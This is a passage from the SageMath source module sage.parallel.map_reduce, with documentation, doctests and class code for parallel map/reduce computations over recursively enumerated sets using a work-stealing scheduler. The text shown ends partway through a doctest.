:mod:`sage.sets.recursively_enumerated_set`). Then, you need to provide a Map
function as well as a Reduce function. Here are some examples:
* **Counting the number of elements**: In this situation, the map function
can be set to ``lambda x : 1``, and the reduce function just adds the
values together, i.e. ``lambda x,y : x+y``.
Here's the Sage code for binary words of length `\leq 16` ::
sage: seeds = [[]]
sage: succ = lambda l: [l+[0], l+[1]] if len(l) <= 15 else []
sage: S = RecursivelyEnumeratedSet(seeds, succ,
....: structure='forest', enumeration='depth')
sage: map_function = lambda x: 1
sage: reduce_function = lambda x,y: x+y
sage: reduce_init = 0
sage: S.map_reduce(map_function, reduce_function, reduce_init)
131071
One can check that this is indeed the number of binary words of
length `\leq 16` ::
sage: factor(131071 + 1)
2^17
Note that the map and reduce functions here are equivalent to the default
values of the :meth:`sage.combinat.backtrack.SearchForest.map_reduce` method,
so that to compute the number of elements you only need to call::
sage: S.map_reduce()
131071
You don't need to use :func:`RecursivelyEnumeratedSet`; you can directly use
:class:`RESetMapReduce`. This is needed if you want to have fine
control over the parallel execution (see :ref:`advanced-use` below)::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots = [[]],
....: children = lambda l: [l+[0], l+[1]] if len(l) <= 15 else [],
....: map_function = lambda x : 1,
....: reduce_function = lambda x,y: x+y,
....: reduce_init = 0 )
sage: S.run()
131071
* **Generating series**: In this situation, the map function associates a
monomial to each element of `S`, while the Reduce function is still equal to
``lambda x,y : x+y``.
Here's the Sage code for binary words of length `\leq 16` ::
sage: S = RecursivelyEnumeratedSet(
....: [[]], lambda l: [l+[0], l+[1]] if len(l) < 16 else [],
....: structure='forest', enumeration='depth')
sage: sp = S.map_reduce(
....: map_function = lambda z: x**len(z),
....: reduce_function = lambda x,y: x+y,
....: reduce_init = 0 )
sage: sp
65536*x^16 + 32768*x^15 + 16384*x^14 + 8192*x^13 + 4096*x^12 + 2048*x^11 + 1024*x^10 + 512*x^9 + 256*x^8 + 128*x^7 + 64*x^6 + 32*x^5 + 16*x^4 + 8*x^3 + 4*x^2 + 2*x + 1
This is of course `\sum_{i=0}^{i=16} (2x)^i`::
sage: bool(sp == sum((2*x)^i for i in range(17)))
True
Here is another example where we count permutations of size `\leq 8` (here
we use the default values)::
sage: S = RecursivelyEnumeratedSet( [[]],
....: lambda l: ([l[:i] + [len(l)] + l[i:] for i in range(len(l)+1)]
....: if len(l) < 8 else []),
....: structure='forest', enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
This is of course `\sum_{i=0}^{i=8} i! x^i`::
sage: bool(sp == sum(factorial(i)*x^i for i in range(9)))
True
* **Post Processing**: We now demonstrate the use of ``post_process``. We
generate the permutations as previously, but we only perform the map/reduce
computation on those of even ``len``. Of course we get the even part of the
previous generating series::
sage: S = RecursivelyEnumeratedSet( [[]],
....: lambda l: ([l[:i] + [len(l)+1] + l[i:] for i in range(len(l)+1)]
....: if len(l) < 8 else []),
....: post_process = lambda l : l if len(l) % 2 == 0 else None,
....: structure='forest', enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 720*x^6 + 24*x^4 + 2*x^2 + 1
This is also useful for example to call a constructor on the generated
elements::
sage: S = RecursivelyEnumeratedSet( [[]],
....: lambda l: ([l[:i] + [len(l)+1] + l[i:] for i in range(len(l)+1)]
....: if len(l) < 5 else []),
....: post_process = lambda l : Permutation(l) if len(l) == 5 else None,
....: structure='forest', enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**(len(z.inversions()))); sp
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
We get here a polynomial called the `x`-factorial of `5` that is
`\prod_{i=1}^{i=5} \frac{1-x^i}{1-x}`::
sage: (prod((1-x^i)/(1-x) for i in range(1,6))).simplify_rational()
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
* **Listing the objects**: One can also compute the list of objects in a
:class:`RecursivelyEnumeratedSet of forest type<sage.combinat.backtrack.SearchForest>`
using :class:`RESetMapReduce`. As an example, we compute the set of numbers
between 1 and 63, generated by their binary expansion::
sage: S = RecursivelyEnumeratedSet( [1],
....: lambda l: [(l<<1)|0, (l<<1)|1] if l < 1<<5 else [],
....: structure='forest', enumeration='depth')
Here is the list computed without :class:`RESetMapReduce`::
sage: serial = list(S)
sage: serial
[1, 2, 4, 8, 16, 32, 33, 17, 34, 35, 9, 18, 36, 37, 19, 38, 39, 5, 10, 20, 40, 41, 21, 42, 43, 11, 22, 44, 45, 23, 46, 47, 3, 6, 12, 24, 48, 49, 25, 50, 51, 13, 26, 52, 53, 27, 54, 55, 7, 14, 28, 56, 57, 29, 58, 59, 15, 30, 60, 61, 31, 62, 63]
Here is how to perform the parallel computation. The order of the lists
depends on the synchronisation of the various computation processes and
therefore should be considered as random::
sage: parall = S.map_reduce( lambda x: [x], lambda x,y: x+y, [] )
sage: parall # random
[1, 3, 7, 15, 31, 63, 62, 30, 61, 60, 14, 29, 59, 58, 28, 57, 56, 6, 13, 27, 55, 54, 26, 53, 52, 12, 25, 51, 50, 24, 49, 48, 2, 5, 11, 23, 47, 46, 22, 45, 44, 10, 21, 43, 42, 20, 41, 40, 4, 9, 19, 39, 38, 18, 37, 36, 8, 17, 35, 34, 16, 33, 32]
sage: sorted(serial) == sorted(parall)
True
.. _advanced-use:
Advanced use
------------
Fine control of the execution of a map/reduce computations is obtained by
passing parameters to the :meth:`RESetMapReduce.run` method. One can use the
three following parameters:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``reduce_locally`` -- whether the workers should reduce locally
their work or send results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
Here is an example of how to deal with a timeout::
sage: from sage.parallel.map_reduce import RESetMPExample, AbortError
sage: EX = RESetMPExample(maxl = 100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: EX = RESetMPExample(maxl = 8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
As for ``reduce_locally``, one should not see any difference, except for speed
during normal usage. Most of the time the user should leave it set to ``True``,
unless they set up a mechanism to consume the partial results as soon as they
arrive. See :class:`RESetParallelIterator` and in particular the ``__iter__``
method for an example of consumer use.
.. _profiling:
Profiling
---------
It is possible to profile a map/reduce computation. First we create a
:class:`RESetMapReduce` object::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots = [[]],
....: children = lambda l: [l+[0], l+[1]] if len(l) <= 15 else [],
....: map_function = lambda x : 1,
....: reduce_function = lambda x,y: x+y,
....: reduce_init = 0 )
The profiling is activated by the ``profile`` parameter. The value provided
should be a prefix (including a possible directory) for the profile dump::
sage: prof = tmp_dir('RESetMR_profile')+'profcomp'
sage: res = S.run(profile=prof) # random
[RESetMapReduceWorker-1:58] (20:00:41.444) Profiling in /home/user/.sage/temp/mymachine.mysite/32414/RESetMR_profilewRCRAx/profcomp1 ...
...
[RESetMapReduceWorker-1:57] (20:00:41.444) Profiling in /home/user/.sage/temp/mymachine.mysite/32414/RESetMR_profilewRCRAx/profcomp0 ...
sage: res
131071
In this example, the profiles have been dumped in files such as
``profcomp0``. One can then load and print them as follows. See
:class:`profile.profile` for more details::
sage: import cProfile, pstats
sage: st = pstats.Stats(prof+'0')
sage: st.strip_dirs().sort_stats('cumulative').print_stats() #random
...
Ordered by: cumulative time
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.023 0.023 0.432 0.432 map_reduce.py:1211(run_myself)
11968 0.151 0.000 0.223 0.000 map_reduce.py:1292(walk_branch_locally)
...
<pstats.Stats instance at 0x7fedea40c6c8>
.. SEEALSO::
`The Python Profilers <https://docs.python.org/2/library/profile.html>`_
for more detail on profiling in python.
.. _logging:
Logging
-------
The computation progress is logged through a :class:`logging.Logger` in
:obj:`sage.parallel.map_reduce.logger` together with :class:`logging.StreamHandler`
and a :class:`logging.Formatter`. They are currently configured to print
warning messages on the console.
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
.. note::
Calls to logger which involve printing the node are commented out in the
code, because the printing (to a string) of the node can be very time
consuming depending on the node and it happens before the decision whether
the logger should record the string or drop it.
.. _protocol-description:
How does it work?
------------------
The scheduling algorithm we use here is an adaptation of :wikipedia:`Work_stealing`:
In a work stealing scheduler, each processor in a computer system has a
queue of work items (computational tasks, threads) to perform. [...]. Each
work item is initially put on the queue of the processor executing the
work item. When a processor runs out of work, it looks at the queues of
other processors and "steals" their work items. In effect, work stealing
distributes the scheduling work over idle processors, and as long as all
processors have work to do, no scheduling overhead occurs.
For communication we use Python's basic :mod:`multiprocessing` module. We
first describe the different actors and communications tools used by the
system. The work is done under the coordination of a **master** object (an
instance of :class:`RESetMapReduce`) by a bunch of **worker** objects
(instances of :class:`RESetMapReduceWorker`).
Each running map-reduce instance works on a :class:`RecursivelyEnumeratedSet of
forest type<sage.combinat.backtrack.SearchForest>` called here `C` and is
coordinated by a :class:`RESetMapReduce` object called the **master**. The
master is in charge of launching the work, gathering the results and cleaning
up at the end of the computation. It doesn't perform any computation
associated with generating the elements of `C` nor with computing the
mapped function. It does, however, occasionally perform a reduce, but most reducing
is by default done by the workers. Also thanks to the work-stealing algorithm,
the master is only involved in detecting the termination of the computation
but all the load balancing is done at the level of the workers.
Workers are instances of :class:`RESetMapReduceWorker`. They are responsible for
doing the actual computations: element generation, mapping and reducing. They
are also responsible for the load balancing thanks to work-stealing.
Here is a description of the attributes of the **master** relevant to the
map-reduce protocol:
- ``master._results`` -- a :class:`~multiprocessing.queues.SimpleQueue` where
the master gathers the results sent by the workers.
- ``master._active_tasks`` -- a :class:`~multiprocessing.Semaphore` recording
the number of active tasks. The work is done when it gets to 0.
- ``master._done`` -- a :class:`~multiprocessing.Lock` which ensures that
shutdown is done only once.
- ``master._aborted`` -- a :func:`~multiprocessing.Value` storing a shared
:class:`ctypes.c_bool` which is ``True`` if the computation was aborted before
all the workers ran out of work.
- ``master._workers`` -- a list of :class:`RESetMapReduceWorker` objects. Each worker is
identified by its position in this list.
Each worker is a process (:class:`RESetMapReduceWorker` inherits from
:class:`~multiprocessing.Process`) which contains:
- ``worker._iproc`` -- the identifier of the worker, that is, its position in
the master's list of workers
- ``worker._todo`` -- a :class:`collections.deque` storing the nodes to be
processed by the worker. It is used as a stack by the worker; thieves steal
from the bottom of this queue.
- ``worker._request`` -- a :class:`~multiprocessing.queues.SimpleQueue` storing
steal requests submitted to ``worker``.
- ``worker._read_task``, ``worker._write_task`` -- a
:class:`~multiprocessing.queues.Pipe` used to transfer nodes during steals.
- ``worker._thief`` -- a :class:`~threading.Thread` which is in charge of stealing from
``worker._todo``.
Here is a schematic of the architecture:
.. _figure-map_reduce_arch:
.. figure:: ../../media/map_reduce_arch.png
How thefts are performed
------------------------
During normal time (that is, when all workers are active) a worker ``W`` is
iterating through a loop inside
:meth:`RESetMapReduceWorker.walk_branch_locally`. Work nodes are taken from
and new nodes are appended to ``W._todo``. When a worker ``W`` runs
out of work, that is when ``W._todo`` is empty, it tries to steal
some work (i.e. a node) from another worker. This is performed in the
:meth:`RESetMapReduceWorker.steal` method.
From the point of view of ``W`` here is what happens:
- ``W`` signals to the master that it is idle :meth:`master._signal_task_done`;
- ``W`` chooses a victim ``V`` at random;
- ``W`` sends a request to ``V``: it puts its identifier into ``V._request``;
- ``W`` tries to read a node from ``W._read_task``. Then three things may happen:
+ a proper node is read. Then the theft was a success and ``W`` starts
working locally on the received node.
+ ``None`` is received. This means that ``V`` was idle. Then ``W`` tries
another victim.
+ ``AbortError`` is received. This means either that the computation was
aborted or that it simply succeeded and that no more work is required by
``W``. Therefore an ``AbortError`` exception is raised, leading ``W`` to
shut down.
We now describe the protocol on the victim's side. Each worker process contains
a :class:`Thread` which we call ``T`` for thief, which acts like a kind of
Trojan horse during a theft. It is normally blocked waiting for a steal request.
From the point of view of ``V`` and ``T``, here is what happens:
- during normal time ``T`` is blocked waiting on ``V._request``;
- upon steal request, ``T`` wakes up receiving the identification of ``W``;
- ``T`` signals to the master that a new task is starting by
:meth:`master._signal_task_start`;
- Two things may happen depending on whether the queue ``V._todo`` is empty or not.
Remark that due to the GIL, there is no parallel execution between the
victim ``V`` and its thief thread ``T``.
+ If ``V._todo`` is empty, then ``None`` is answered on
``W._write_task``. The end of the task is immediately signaled to the master
through :meth:`master._signal_task_done`.
+ Otherwise, a node is removed from the bottom of ``V._todo``. The node is
sent to ``W`` on ``W._write_task``. The task will be ended by ``W``, that
is when finished working on the subtree rooted at the node, ``W`` will
call :meth:`master._signal_task_done`.
The end of the computation
--------------------------
To detect when a computation is finished, we keep a synchronized integer which
counts the number of active tasks. This is essentially a semaphore, but
semaphores are broken on Darwin's OSes, so we ship two implementations
depending on the OS (see :class:`ActiveTaskCounter` and
:class:`ActiveTaskCounterDarwin` and the note below).
When a worker finishes working on a task, it calls
:meth:`master._signal_task_done`. This decreases the task counter
``master._active_tasks``. When it reaches 0, it means that there are no more
nodes: the work is done. The worker executes :meth:`master._shutdown` which
sends ``AbortError`` on all :meth:`worker._request` and
:meth:`worker._write_task` queues. Each worker or thief thread receiving such
a message raises the corresponding exception, therefore stopping its work. A
lock called ``master._done`` ensures that shutdown is done only once.
Finally, it is also possible to interrupt the computation before its end by
calling :meth:`master.abort()`. This is done by setting
``master._active_tasks`` to 0 and calling :meth:`master._shutdown`.
.. warning:: The MacOSX Semaphore bug
Darwin's OSes do not correctly implement POSIX's semaphore semantics.
Indeed, on this system, acquire may fail and return False not only because
the semaphore is equal to zero but also **because someone else is trying to
acquire** at the same time. This renders the usage of Semaphore impossible
on MacOSX, so on this system we use a synchronized integer.
.. _examples:
Are there examples of classes?
-------------------------------
Yes! Here they are:
- :class:`RESetMPExample` -- a simple basic example
- :class:`RESetParallelIterator` -- a more advanced example using a non-standard
communication configuration.
Tests
-----
Generating series for the sum of strictly decreasing lists of integers smaller
than 15::
sage: y = polygen(ZZ, 'y')
sage: R = RESetMapReduce(
....: roots = [([], 0, 0)] +[([i], i, i) for i in range(1,15)],
....: children = lambda list_sum_last:
....: [(list_sum_last[0] + [i], list_sum_last[1] + i, i) for i in range(1, list_sum_last[2])],
....: map_function = lambda li_sum_dummy: y**li_sum_dummy[1])
sage: sg = R.run()
sage: bool(sg == expand(prod((1+y^i) for i in range(1,15))))
True
Classes and methods
-------------------
"""
from __future__ import print_function, absolute_import
from multiprocessing import Process, Value, Semaphore, Lock, Pipe
from multiprocessing.queues import Queue, SimpleQueue
from multiprocessing.sharedctypes import RawArray
from threading import Thread
from six.moves import queue
from sage.sets.recursively_enumerated_set import RecursivelyEnumeratedSet # _generic
from sage.misc.lazy_attribute import lazy_attribute
import collections
import copy
import os
import sys
import random
import ctypes
import logging
logger = logging.getLogger(__name__)
logger.__doc__ = """
A logger for :mod:`sage.parallel.map_reduce`
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
"""
logger.setLevel(logging.WARN)
#logger.setLevel(logging.INFO)
#logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'[%(processName)s-%(threadName)s] (%(asctime)s.%(msecs)03.f) %(message)s',
datefmt='%H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
def proc_number(max_proc=None):
r"""
Return the number of processes to use
INPUT:
- ``max_proc`` -- an upper bound on the number of processes or
``None``.
EXAMPLES::
sage: from sage.parallel.map_reduce import proc_number
sage: proc_number() # random
8
sage: proc_number(max_proc=1)
1
sage: proc_number(max_proc=2) in (1, 2)
True
"""
from sage.parallel.ncpus import ncpus
n = ncpus()
if max_proc is None:
return n
else:
return min(max_proc, n)
class AbortError(Exception):
r"""
Exception for aborting parallel computations
This is used both as exception or as abort message
TESTS::
sage: from sage.parallel.map_reduce import AbortError
sage: raise AbortError
Traceback (most recent call last):
...
AbortError
"""
pass
class ActiveTaskCounterDarwin(object):
r"""
Handling the number of Active Tasks
A class for handling the number of active tasks in a distributed computation
process. This is essentially a semaphore, but Darwin's OSes do not
correctly implement POSIX's semaphore semantic. So we use a shared integer
with a lock.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = Value(ctypes.c_int, task_number)
self._lock = Lock()
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)"%(self._active_tasks.value)
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0;
otherwise it increments the counter and returns its value after the
increment.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
with self._lock:
# The following test is not necessary but it allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks.value <= 0:
return 0
self._active_tasks.value += 1
return self._active_tasks.value
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns its value
after the decrement.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
with self._lock:
self._active_tasks.value -= 1
return self._active_tasks.value
def abort(self):
r"""
Set the task counter to 0.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
with self._lock:
self._active_tasks.value = 0
class ActiveTaskCounterPosix(object):
r"""
Handling the number of Active Tasks
A class for handling the number of active tasks in a distributed computation
process. This is the standard implementation on POSIX compliant OSes. We
essentially wrap a semaphore.
.. note::
A legitimate question is whether there is a need to keep the two
implementations. I ran the following experiment on my machine::
S = RecursivelyEnumeratedSet( [[]],
lambda l: ([l[:i] + [len(l)] + l[i:] for i in range(len(l)+1)]
if len(l) < NNN else []),
structure='forest', enumeration='depth')
%time sp = S.map_reduce(lambda z: x**len(z)); sp
For NNN = 10, averaging a dozen runs, I got:
- POSIX compliant implementation: 17.04 s
- Darwin's implementation: 18.26 s
So there is a non-negligible overhead. It will probably be worthwhile if we
try to Cythonize the code. So I'm keeping both implementations.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = Semaphore(task_number)
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)"%(self._active_tasks.get_value())
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0;
otherwise it increments the counter and returns its value after the
increment.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
# The following test is not necessary but it allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks._semlock._is_zero():
return 0
self._active_tasks.release()
return self._active_tasks.get_value()
task_start.__doc__ = ActiveTaskCounterDarwin.task_start.__doc__
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns its value
after the decrement.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
# We test whether the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially set the
# semaphore to 0 to stop the computation, so this test is needed.
if not self._active_tasks.acquire(False):
return -1
return self._active_tasks.get_value()
def abort(self):
r"""
Set the task counter to 0.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
while self._active_tasks.acquire(False):
pass
ActiveTaskCounter = (ActiveTaskCounterDarwin if sys.platform == 'darwin'
else ActiveTaskCounterPosix)
# ActiveTaskCounter = ActiveTaskCounterDarwin # to debug DARWIN's implem
class RESetMapReduce(object):
r"""
Map-Reduce on recursively enumerated sets
INPUT:
Description of the set:
- either ``forest=f`` -- where ``f`` is a
:class:`RecursivelyEnumeratedSet of forest type<sage.combinat.backtrack.SearchForest>`
- or a triple ``roots, children, post_process`` as follows
- ``roots=r`` -- The roots of the enumeration
- ``children=c`` -- a function iterating through children nodes, given a parent node
- ``post_process=p`` -- a post processing function
The option ``post_process`` allows for customizing the nodes that
are actually produced. Furthermore, if ``post_process(x)`` returns ``None``,
then ``x`` won't be output at all.
Description of the map/reduce operation:
- ``map_function=f`` -- (default: ``None``)
- ``reduce_function=red`` -- (default: ``None``)
- ``reduce_init=init`` -- (default: ``None``)
.. SEEALSO::
:mod:`the Map/Reduce module <sage.parallel.map_reduce>` for
details and examples.
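EXAMPLES:
Mirroring the module-level example, counting binary words of length at most 16::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots = [[]],
....: children = lambda l: [l+[0], l+[1]] if len(l) <= 15 else [],
....: map_function = lambda x : 1,
....: reduce_function = lambda x,y: x+y,
....: reduce_init = 0 )
sage: S.run()
131071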
"""
def __init__(self, roots = None,
children = None,
post_process = None,
map_function = None,
reduce_function = None,
reduce_init = None,
forest = None):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: R = RESetMapReduce( [[]], lambda : [[]])
sage: R
<sage.parallel.map_reduce.RESetMapReduce object at 0x...>
To silence the coverage checker::
sage: TestSuite(R).run(skip=['_test_pickling'])
"""
if forest is not None:
if not all(x is None for x in (roots, children, post_process)):
raise ValueError("forest arg is incompatible with roots, children and post_process")
self._forest = forest
self._roots = forest._roots
self.children = forest.children
if hasattr(forest, 'post_process'):
self.post_process = forest.post_process
else:
if roots is not None: self._roots = roots
if children is not None: self.children = children
if post_process is not None: self.post_process = post_process
if map_function is not None: self.map_function = map_function
if reduce_function is not None: self.reduce_function = reduce_function
if reduce_init is not None: self._reduce_init = reduce_init
self._profile = None
@lazy_attribute
def _forest(self):
r"""
The forest underlying the map-reduce computation
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: f = EX._forest; f
An enumerated set with a forest structure
sage: f.an_element()
[]
"""
return RecursivelyEnumeratedSet(
self.roots(),
self.children,
post_process=self.post_process,
structure='forest', enumeration='depth')
def roots(self):
r"""
Return the roots of ``self``
OUTPUT:
an iterable of nodes
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(42)
sage: S.roots()
42
"""
return self._roots
def map_function(self, o):
r"""
Return the value of the map function of ``self`` on the node ``o``
INPUT:
- ``o`` -- a node
OUTPUT:
By default ``1``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.map_function(7)
1
sage: S = RESetMapReduce(map_function = lambda x: 3*x + 5)
sage: S.map_function(7)
26
"""
return 1
def reduce_function(self, a, b):
r"""
Return the reduction of the two values ``a`` and ``b``
INPUT:
- ``a``, ``b`` -- two values to be reduced
OUTPUT:
by default the sum of ``a`` and ``b``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_function(4, 3)
7
sage: S = RESetMapReduce(reduce_function=lambda x,y: x*y)
sage: S.reduce_function(4, 3)
12
"""
return a+b
def post_process(self, a):
r"""
Return the result of post-processing the node ``a``
INPUT: ``a`` -- a node
By default, returns ``a`` itself
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.post_process(4)
4
sage: S = RESetMapReduce(post_process=lambda x: x*x)
sage: S.post_process(4)
16
"""
return a
_reduce_init = 0
def reduce_init(self):
r"""
Return the initial element for a reduction
.. note:: This should be overloaded in applications.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_init()
0
sage: S = RESetMapReduce(reduce_init = 2)
sage: S.reduce_init()
2
"""
return copy.copy(self._reduce_init)
def setup_workers(self, max_proc=None, reduce_locally=True):
r"""
Set up the communication channels
INPUT:
- ``max_proc`` -- (integer) an upper bound on the number of
worker processes.
- ``reduce_locally`` -- whether the workers should reduce locally
their work or send results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: S._results
<multiprocessing.queues.Queue object at 0x...>
sage: len(S._workers)
2
"""
self._nprocess = proc_number(max_proc)
self._results = Queue()
self._active_tasks = ActiveTaskCounter(self._nprocess)
self._done = Lock()
self._aborted = Value(ctypes.c_bool, False)
sys.stdout.flush()
sys.stderr.flush()
self._workers = [RESetMapReduceWorker(self, i, reduce_locally)
for i in range(self._nprocess)]
def start_workers(self):
r"""
Launch the workers
The workers should have been created using :meth:`setup_workers`.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(roots=[])
sage: S.setup_workers(2)
sage: S.start_workers()
sage: all(w.is_alive() for w in S._workers)
True
sage: sleep(1)
sage: all(not w.is_alive() for w in S._workers)
True
Cleanups::
sage: S.finish()
"""
if self._nprocess == 0:
raise ValueError("No process connected")
logger.info("Starting work with %s processes", self._nprocess)
logger.debug("Distributing tasks")
for i, task in enumerate(self.roots()):
self._workers[i % len(self._workers)]._todo.append(task)
logger.debug("Starting processes")
sys.stdout.flush()
sys.stderr.flush()
for w in self._workers: w.start()
def get_results(self, timeout=None):
r"""
Get the results from the queue
OUTPUT:
the reduction of the results of all the workers, that is the result of
the map/reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: for v in [1, 2, None, 3, None]: S._results.put(v)
sage: S.get_results()
6
Cleanups::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
res = self.reduce_init()
active_proc = self._nprocess
while active_proc > 0:
try:
logger.debug('Waiting on results; active_proc: %s, '
'timeout: %s, aborted: %s' %
(active_proc, timeout, self._aborted.value))
newres = self._results.get(timeout=timeout)
except queue.Empty:
logger.debug('Timed out waiting for results; aborting')
# If we timed out here then the abort timer should have
# already fired, but just in case it didn't (or is in
# progress) wait for it to finish
self._timer.join()
return
if newres is not None:
logger.debug("Got one result")
res = self.reduce_function(res, newres)
else:
active_proc -= 1
return res
def finish(self):
r"""
Destroy the workers and all the communication objects.
Also gathers the communication statistics before destroying the workers.
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=5)
sage: S.setup_workers(2) # indirect doctest
sage: S._workers[0]._todo.append([])
sage: for w in S._workers: w.start()
sage: _ = S.get_results()
sage: S._shutdown()
sage: S.print_communication_statistics()
Traceback (most recent call last):
...
AttributeError: 'RESetMPExample' object has no attribute '_stats'
sage: S.finish()
sage: S.print_communication_statistics()
#proc: ...
...
sage: _ = S.run() # Cleanup
.. SEEALSO:: :meth:`print_communication_statistics`
"""
if not self._aborted.value:
logger.debug("Joining worker processes...")
for worker in self._workers:
logger.debug("Joining %s"%worker.name)
worker.join()
logger.debug("Joining done")
else:
logger.debug("Killing worker processes...")
for worker in self._workers:
logger.debug("Terminating %s"%worker.name)
worker.terminate()
logger.debug("Killing done")
del self._results, self._active_tasks, self._done
self._get_stats()
del self._workers
def abort(self):
r"""
Abort the current parallel computation
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
